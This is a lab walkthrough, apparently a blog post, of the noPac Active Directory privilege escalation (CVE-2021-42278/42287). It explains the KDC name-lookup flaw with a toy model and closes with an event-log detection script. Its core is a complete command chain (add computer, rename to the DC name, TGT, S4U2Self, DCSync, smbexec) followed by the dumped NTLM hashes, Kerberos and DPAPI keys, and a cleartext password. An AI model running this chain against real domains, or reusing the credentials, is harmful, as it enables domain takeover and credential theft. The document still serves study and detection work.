SamAccountName (nopac)
CVE IDs: CVE-2021-42287, used together with CVE-2021-42278.
References:
• eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation
• cube0x0/noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter (github.com)
• sAMAccountName spoofing - The Hacker Recipes
• Added -self, -altservice and -u2u to getST for S4U2self abuse, S4U2self+u2u, and service substitution by ShutdownRepo · Pull Request #1202 · fortra/impacket (github.com)
• Added renameMachine.py by ShutdownRepo · Pull Request #1224 · fortra/impacket (github.com)
Kerberos answers the question of who you are; on top of it Microsoft added the PAC (Privilege Attribute Certificate), which answers what you are allowed to do and completes the authorization flow.
Core of the vulnerability:
In the KDC's lookup logic, if the account UserName is not found, the KDC goes on to look for UserName$. If that still does not exist, it looks for an account whose altSecurityIdentities attribute matches (this attribute holds the mappings from X.509 certificates or external Kerberos accounts used for authentication to this user).
Trigger points:
eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation
Principle analysis of the in-domain privilege escalation vulnerabilities CVE-2021-42287 and CVE-2021-42278 - FreeBuf (域内提权漏洞CVE-2021-42287与CVE-2021-42278原理分析)
1. Cross-domain requests: when a request crosses domains, the target domain's Active Directory database cannot find the other domain's user, so the request enters this UserName-handling logic. 2. Modifying the sAMAccountName attribute: in the current domain, changing sAMAccountName can make the KDC fail to find the user, which again leads into this logic.
That alone is not enough: merely steering the KDC into this UserName-handling logic does not let us forge elevated privileges.
The data block in a ticket that represents the user's identity and privileges is the PAC. (On a Samba-joined host it can be dumped with: net ads kerberos pac dump -U$USERNAME)
The PAC in the TGT is generated from the pre-authenticated identity, and we cannot forge it. So the forgery has to happen in the service ticket (ST). But normally the PAC in an ST is copied straight from the TGT.
We therefore need a way to make the KDC regenerate the PAC at TGS-REP time instead of copying the one in the TGT. There are two such cases:
1. S4U2Self requests: when the KDC handles a TGS-REQ of type S4U2Self, the PAC is regenerated. 2. Cross-domain TGS requests with a PAC-less TGT: when the KDC handles a cross-domain TGS-REQ whose TGT carries no PAC, the PAC is regenerated.
CVE-2021-42278 - Name impersonation
A computer account's name (i.e. its sAMAccountName attribute) should carry a trailing $, but there was no validation enforcing it. Combined with CVE-2021-42287, this lets an attacker impersonate a domain controller account.
CVE-2021-42287 - KDC bamboozlings
When requesting a service ticket, a TGT has to be presented first. When the KDC cannot find the account named in the TGT, it automatically searches again with a $ appended. If we obtained a TGT for bob and the user bob is then removed (or renamed), using that TGT to request a service ticket for another user to ourselves (S4U2Self) makes the KDC look up bob$ in AD. If the domain controller account bob$ exists, bob (the user) obtains a service ticket for bob$ (the domain controller account) just like any other user would.
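To make the lookup fallback and the two fixes concrete, here is a small Python model of the KDC behaviour described above. It is an added illustration written for this page, not Windows, Impacket or noPac code: the directory, the SIDs, the S4U2Self handling and the two hardening checks (a trailing-$ rule for computer accounts standing in for the KB5008102 sAMAccountName validation, and a SID comparison standing in for the KB5008380 PAC_REQUESTOR check) are simplified assumptions, and the account names follow the lab used later in this post.

```python
"""Toy model of the KDC name lookup abused by CVE-2021-42278/CVE-2021-42287.

Added illustration for this page, not Windows or Impacket code. Accounts, SIDs and
the two hardening checks are simplified stand-ins for the behaviour the page
describes (KB5008102 sAMAccountName validation, KB5008380 PAC_REQUESTOR check).
"""
from dataclasses import dataclass


@dataclass
class Account:
    sam: str                 # sAMAccountName
    sid: str
    groups: tuple = ()
    computer: bool = False
    alt_security_identities: tuple = ()


@dataclass
class PAC:
    sid: str
    groups: tuple


@dataclass
class TGT:
    cname: str   # client name copied from sAMAccountName at AS-REQ time
    pac: PAC     # built from pre-authentication; the client cannot forge it


class Directory:
    def __init__(self, accounts, enforce_dollar=False):
        self.by_name = {a.sam.lower(): a for a in accounts}
        self.enforce_dollar = enforce_dollar

    def lookup(self, name):
        """KDC fallback from the page: name, then name$, then altSecurityIdentities."""
        key = name.lower()
        if key in self.by_name:
            return self.by_name[key]
        if key + "$" in self.by_name:
            return self.by_name[key + "$"]
        for acct in self.by_name.values():
            if name in acct.alt_security_identities:
                return acct
        return None

    def add(self, acct):
        self.by_name[acct.sam.lower()] = acct
        return acct

    def rename(self, old, new):
        acct = self.by_name[old.lower()]
        if self.enforce_dollar and acct.computer and not new.endswith("$"):
            # modelled CVE-2021-42278 fix: computer accounts keep a trailing '$'
            raise ValueError(f"{new!r} is not a valid computer sAMAccountName")
        if new.lower() in self.by_name:
            raise ValueError(f"{new!r} already exists")
        del self.by_name[old.lower()]
        acct.sam = new
        self.by_name[new.lower()] = acct


def as_req(directory, name):
    """AS-REQ: the name exists at this point, so no fallback is involved."""
    acct = directory.lookup(name)
    return TGT(cname=acct.sam, pac=PAC(acct.sid, acct.groups))


def s4u2self(directory, tgt, impersonate, check_requestor=False):
    """TGS-REQ with S4U2Self: the service account is re-resolved from the TGT's
    cname (fallback included) and the PAC for the impersonated user is rebuilt."""
    service = directory.lookup(tgt.cname)
    if service is None:
        raise LookupError(f"no account for {tgt.cname!r}")
    if check_requestor and service.sid != tgt.pac.sid:
        # modelled CVE-2021-42287 fix: the SID recorded in the TGT's PAC must
        # match the account the client name resolved to
        raise PermissionError("PAC_REQUESTOR mismatch")
    user = directory.lookup(impersonate)
    return {"service": service.sam, "client": user.sam, "pac": PAC(user.sid, user.groups)}


def run_nopac(enforce_dollar=False, check_requestor=False):
    """Replay the page's steps; returns (stage, detail) so callers see where it stops."""
    dc = Account("WINTERFELL$", "S-1-5-21-1-1-1-1001", ("Domain Controllers",), computer=True)
    admin = Account("Administrator", "S-1-5-21-1-1-1-500", ("Domain Admins",))
    d = Directory([dc, admin], enforce_dollar=enforce_dollar)

    d.add(Account("samaccountname$", "S-1-5-21-1-1-1-1122", computer=True))  # addcomputer.py
    try:
        d.rename("samaccountname$", "winterfell")   # renameMachine.py: computer -> DC name without '$'
    except ValueError as e:
        return ("blocked at rename", str(e))
    tgt = as_req(d, "winterfell")                   # getTGT.py while the name collides
    d.rename("winterfell", "samaccount$")           # renameMachine.py back (the page uses this shorter name)
    try:
        st = s4u2self(d, tgt, "Administrator", check_requestor)   # getST.py -self -impersonate
    except PermissionError as e:
        return ("blocked at S4U2Self", str(e))
    return ("ticket issued", st)


if __name__ == "__main__":
    for flags in ({}, {"check_requestor": True}, {"enforce_dollar": True}):
        print(flags, run_nopac(**flags))
```

run_nopac() with no flags replays the steps and returns an Administrator PAC inside a ticket addressed to WINTERFELL$; turning on either check stops the chain at the corresponding step, which shows why the rename-back before S4U2Self matters (the fallback only fires once 'winterfell' no longer resolves directly) and why the DC-side PAC_REQUESTOR check alone already breaks the chain.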
Check whether we can add a computer account
Here we use the account north/jon.snow:iknownothing obtained earlier through kerberoasting.
Find a cme module to check the machine account quota (ms-DS-MachineAccountQuota):
cme ldap -L
proxychains -q cme ldap winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M MAQ
If cme runs inside Docker, remember to add the hosts entry inside the container as well; LDAP here cannot be reached through the bare IP.
Preparing Impacket
At the time of writing, the Linux exploitation tooling had not yet been merged into impacket's main branch, so the steps below were needed. (Without the merged branch the later scripts are missing and the exploitation fails.) Both pull requests have since been merged: impacket 0.11.0 and later ship renameMachine.py and the getST.py -self/-altservice/-u2u options, so with a current release the PR merge can be skipped.
sudo -s
pip3 uninstall pycrypto
pip3 install pycryptodomex  # fixes the crypto import error
git clone https://github.com/SecureAuthCorp/impacket myimpacket
cd myimpacket
git checkout -b mydev
python3 -m virtualenv myimpacket # optional, or use conda
source myimpacket/bin/activate # optional, or use conda
python3 -m pip install .
Fetch the pull requests we want (the exegol install script has a good list of PRs worth merging: https://github.com/ShutdownRepo/Exegol-images/blame/main/sources/install.sh#L286)
git fetch origin pull/1224/head:1224
git fetch origin pull/1202/head:1202
git merge 1202
git merge 1224
If the scripts complain about missing options after the merge, re-run python3 -m pip install . so that the installed package matches the merged tree.
Re-order the path lookup so our pyenv bin is loaded before the other entries in $PATH (required on zsh; bash picks up our pyenv bin directly)
rehash
Then try the following commands (if you skip this step, running the scripts directly from examples/ with python3 should also work)
renameMachine.py
getST.py
exploit
What we do: add a computer, clear that computer's SPNs, rename it to the DC's name (without the $), obtain a TGT for it, rename the computer back to its original name, use the TGT obtained earlier to request a service ticket via S4U2Self, and finally run DCSync. The rename-back has to happen before the S4U2Self request: only once the name 'winterfell' no longer exists does the KDC's fallback resolve it to the DC account WINTERFELL$.
Add the computer
Clear the SPNs of our new computer
Rename the computer (computer -> DC)
Get a TGT for the machine account
Restore the computer name
Use the TGT obtained earlier to request an ST from the DC via S4U2Self
Use the ST to run DCSync (replication over DRSUAPI; no shadow copy of ntds.dit is needed)
• Add the computer
sudo python3 ./examples/addcomputer.py -computer-name 'samaccountname$' -computer-pass 'ComputerPassword' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'
• Clear the Service Principal Names (SPNs) of our new computer (dirkjanm/krbrelayx)
sudo python3 addspn.py --clear -t 'samaccountname$' -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' 'winterfell.north.sevenkingdoms.local'
• Rename the computer (computer -> DC)
impacket/renameMachine.py at 0c74df065eeffde8c24edb56e880ab49c82530b7 · fortra/impacket · GitHub
sudo python3 renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
• Get a TGT for the machine account (its sAMAccountName is now 'winterfell' and its password is still ComputerPassword; the ticket is saved as winterfell.ccache)
sudo python3 getTGT.py -dc-ip 'winterfell.north.sevenkingdoms.local' 'north.sevenkingdoms.local'/'winterfell':'ComputerPassword'
• Restore the computer name (note that the account is restored under the shorter name 'samaccount$', not the 'samaccountname$' it was created with; that is the name that appears in the dump below and that the cleanup step deletes)
sudo python3 renameMachine.py -current-name 'winterfell' -new-name 'samaccount$' north.sevenkingdoms.local/jon.snow:iknownothing
• Use the TGT obtained earlier to request an ST from the DC via S4U2Self
S4U2Self: through the S4U2Self extension, service A can obtain from the domain controller a service ticket for account B to service A, exactly as if B had requested a ticket for service A itself. In other words, the protocol yields a service ticket for any domain account to service A, without account B ever authenticating to the domain. Because the KDC resolved our TGT's client name to the DC account, the ticket it issues is for the DC's own service; -altservice rewrites the service name in it to CIFS/winterfell.north.sevenkingdoms.local so that it can be used against SMB on the DC.
export KRB5CCNAME=winterfell.ccache
sudo python3 getST.py -self -impersonate 'administrator' -altservice 'CIFS/winterfell.north.sevenkingdoms.local' -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' 'north.sevenkingdoms.local'/'winterfell' -debug
We obtain the ST:
administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache
• Use the ST to run DCSync (replication over DRSUAPI, which reads the ntds.dit secrets without needing a shadow copy)
export KRB5CCNAME=administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache
sudo python3 secretsdump.py -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' @'winterfell.north.sevenkingdoms.local'
Note that sudo may strip KRB5CCNAME from the environment; the run shown below was done without sudo.
wulala@wulala-VirtualBox:~/intranet-tools/myimpacket/examples$ python3 secretsdump.py -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' @'winterfell.north.sevenkingdoms.local'
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e5 - Copyright 2022 Fortra
[*] Target system bootKey: 0x5b6e7a363d81053ee669b2c4e3deb1f7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed.The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
NORTH\WINTERFELL$:plain_password_hex:39360354776840b555eba793d3a224f63f4fbc6f7a9ee6e1028014c125b4bc32032900ea1b5b9265b999f6e28b0d2c1eefa0d84eee7f7ddae2aa439c05b062dcc97ba1bb59b55a19284b42fe29f272c50c295711d60867e7f1f59e52dfada9346396f9316890d43652fef0720b595b2cf3c6201444fa1861cea4ff4b3ea159410c0ce7d2a9cb0d2c9e2168a84cb88fb8510616ddbfa6232f4c28ac8756b5840d5f0ffbad8cd08482f80d74d4d403c71e9befbf3eaa8cb1e705023f9eca24a3918bb3b32e2293c14d0f8ce740c7439668e77c755e70e98dedde1feb510ca206584aebe9f67ea5fcb0e522e664b3c17ab7
NORTH\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:c7d77abdc6bcdee8cf4cf1e1c1def774:::
[*] DefaultPassword
NORTH\robb.stark:sexywolfy
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb77f262f9c9abab9bfcba2a9e0f269d87e10accf
dpapi_userkey:0x7e4428ece910efba259e385e5d2cd23b80fa23b2
[*] NL$KM
0000 22 34 01 76 01 70 30 93 88 A7 6B B2 87 43 59 69 "4.v.p0...k..CYi
0010 0E 41 BD 22 0A 0C CC 23 3A 5B B6 74 CB 90 D6 35 .A."...#:[.t...5
0020 14 CA D8 45 4A F0 DB 72 D5 CF 3B A1 ED 7F 3A 98 ...EJ..r..;...:.
0030 CD 4D D6 36 6A 35 24 2D A0 EB 0F 8E 3F 52 81 C9 .M.6j5$-....?R..
NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:2c643546d00054420505a2bf86d77c47:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:c7d77abdc6bcdee8cf4cf1e1c1def774:::
CASTELBLACK$:1104:aad3b435b51404eeaad3b435b51404ee:287b58f9e95f6320b02cb6f145767787:::
samaccount$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:a1ecedd368730bf7e6ef16570f918d33:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0
Administrator:des-cbc-md5:fe58cdcd13a43243
krbtgt:aes256-cts-hmac-sha1-96:f96ec2ef58e7ac5d8670ff97bafe7e16d27a25c0d29774e64f7b8f4b43ee78dd
krbtgt:aes128-cts-hmac-sha1-96:6265aa3383780121404d894cd629f3ba
krbtgt:des-cbc-md5:5d80d049ecec835d
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d
arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df
arya.stark:des-cbc-md5:13525243d6643285
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203
eddard.stark:des-cbc-md5:8067f7abecc7d346
catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283
catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93
catelyn.stark:des-cbc-md5:6b314670a2f84cfb
robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42
robb.stark:des-cbc-md5:c4b62c797f5dd01f
sansa.stark:aes256-cts-hmac-sha1-96:cd2460a78e8993442498d3f242a88ae110ec6556e40c8add6aab12cfb44b3fa1
sansa.stark:aes128-cts-hmac-sha1-96:18b9d10bd18d1956ba73c14426ec519f
sansa.stark:des-cbc-md5:e66445757c31c176
brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10
brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73
brandon.stark:des-cbc-md5:76e61fda8a4f5245
rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda
rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d
rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a
hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287
hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60
hodor:des-cbc-md5:d5764373f2545dfd
jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb
jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b
jon.snow:des-cbc-md5:084358ceb3290d7c
samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605
samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae
samwell.tarly:des-cbc-md5:5efed0e0a45dd951
jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50
jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b
jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea
sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029
sql_svc:des-cbc-md5:8645d5cd402f16c7
WINTERFELL$:aes256-cts-hmac-sha1-96:427231ba6db71295c8473e96e9388b667152521f639c725737f7a1fd1293740c
WINTERFELL$:aes128-cts-hmac-sha1-96:272aa17950a7f3fe9c8e30d5fedcdfa7
WINTERFELL$:des-cbc-md5:7ff72c75d5d683b5
CASTELBLACK$:aes256-cts-hmac-sha1-96:56b50b6ea3284c039c56136df98cb55439ae52c75f470695b8b6bc7681b87312
CASTELBLACK$:aes128-cts-hmac-sha1-96:4638c39e9eff75b4066546ea880faf92
CASTELBLACK$:des-cbc-md5:20bafd767f9d57ef
samaccount$:aes256-cts-hmac-sha1-96:7b9a52e2d94aa24dcea3d181001b03380291929a0094fa5b24f44d2a221faa89
samaccount$:aes128-cts-hmac-sha1-96:98c00ce456e342106141609163511daa
samaccount$:des-cbc-md5:f8ab2001bcecc252
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:fdf743184a24dfad6ce6f39bcd85a907f95559780b315b7af21237015d0d8cae
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:9e000305a1ec2cc04c62dcef55a0970f
SEVENKINGDOMS$:des-cbc-md5:4a9475f74ca46d23
[*] Cleaning up...
wulala@wulala-VirtualBox:~/intranet-tools/myimpacket/examples$
Now clean up by deleting the computer we created, using the Administrator hash just obtained. Both names are tried here; since the account was restored as 'samaccount$', it is the second command that actually removes it.
sudo python3 addcomputer.py -computer-name 'samaccountname$' -delete -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4' 'north.sevenkingdoms.local/Administrator'
sudo python3 addcomputer.py -computer-name 'samaccount$' -delete -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4' 'north.sevenkingdoms.local/Administrator'
Test command execution with the Administrator hash we obtained
sudo python3 smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4' Administrator@north.sevenkingdoms.local
From here, log in directly or move on to whatever comes next.
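The sequence above leaves a clear trail in the domain controller's Security log: event 4741 (computer account created) by a low-privileged user, immediately followed by two 4781 events (account name changed) in which a computer account first loses its trailing $ and takes a domain controller's name, then gets a $ back, and finally a 4743 (computer account deleted). The following Python detector is an added example, not part of the original post or of any tool it cites; it runs those rules over a constructed set of events whose records are reduced to the fields the logic needs (SubjectUserName, TargetUserName, OldTargetUserName and NewTargetUserName as named in the Windows Security EventData), and the list of DC account names is assumed input.

```python
"""Detector for the noPac account-rename pattern in Windows Security events.

Added example for this page, not code from the post or from any tool it cites.
The events below are constructed and trimmed to the fields used; the DC account
list is assumed input.
"""
from datetime import datetime, timedelta

# Constructed sample events (not real log output). Field names follow the
# EventData names of 4741 / 4781 / 4743 in the Windows Security log.
EVENTS = [
    {"time": "2023-05-11T16:30:01", "id": 4741, "SubjectUserName": "jon.snow",
     "TargetUserName": "samaccountname$"},
    {"time": "2023-05-11T16:30:05", "id": 4781, "SubjectUserName": "jon.snow",
     "OldTargetUserName": "samaccountname$", "NewTargetUserName": "winterfell"},
    {"time": "2023-05-11T16:30:09", "id": 4781, "SubjectUserName": "jon.snow",
     "OldTargetUserName": "winterfell", "NewTargetUserName": "samaccount$"},
    {"time": "2023-05-11T16:31:00", "id": 4743, "SubjectUserName": "Administrator",
     "TargetUserName": "samaccount$"},
    # benign: helpdesk renames a workstation and keeps the '$'
    {"time": "2023-05-11T17:00:00", "id": 4781, "SubjectUserName": "eddard.stark",
     "OldTargetUserName": "ws01$", "NewTargetUserName": "ws02$"},
    # benign: a user account rename
    {"time": "2023-05-11T17:05:00", "id": 4781, "SubjectUserName": "eddard.stark",
     "OldTargetUserName": "r.stark", "NewTargetUserName": "robb.stark"},
]

DOMAIN_CONTROLLERS = {"WINTERFELL$"}      # assumed inventory of DC sAMAccountNames
CORRELATION_WINDOW = timedelta(minutes=10)


def detect(events, dcs=DOMAIN_CONTROLLERS, window=CORRELATION_WINDOW):
    """Return one alert per suspicious 4781, listing the rules that fired."""
    alerts = []
    tracked = {}   # (subject, current account name) -> time of the 4741 that created it
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        subject = ev["SubjectUserName"].lower()
        if ev["id"] == 4741:
            tracked[(subject, ev["TargetUserName"].lower())] = t
            continue
        if ev["id"] != 4781:
            continue
        old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
        reasons = []
        # Rule 1: a computer account lost its trailing '$' (the CVE-2021-42278 side)
        if old.endswith("$") and not new.endswith("$"):
            reasons.append("computer account lost its trailing '$'")
        # Rule 2: the new name, with '$' appended, is a domain controller's account
        dc_name = new.rstrip("$").upper() + "$"
        if dc_name in dcs:
            reasons.append("new name collides with domain controller " + dc_name)
        # Rule 3: the same principal created this account shortly before (MAQ abuse);
        # the account is followed through renames so the rename-back is caught too
        key = (subject, old.lower())
        if key in tracked:
            created = tracked.pop(key)
            tracked[(subject, new.lower())] = created
            if t - created <= window:
                reasons.append("renamed by the same principal that created it")
        if reasons:
            alerts.append({
                "time": ev["time"], "subject": ev["SubjectUserName"],
                "old": old, "new": new, "reasons": reasons,
                "severity": "critical" if len(reasons) > 1 else "high",
            })
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["time"], a["severity"], f"{a['subject']}: {a['old']} -> {a['new']}", a["reasons"])
```

Rule 2 is the one worth keeping even after patching: a rename to a DC's name minus the $ has no legitimate reason, and a 4741 followed by a 4781 from the same non-admin principal is exactly what an unchanged MachineAccountQuota allows.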
Originally published on the WeChat public account wulala520: SamAccountName (nopac)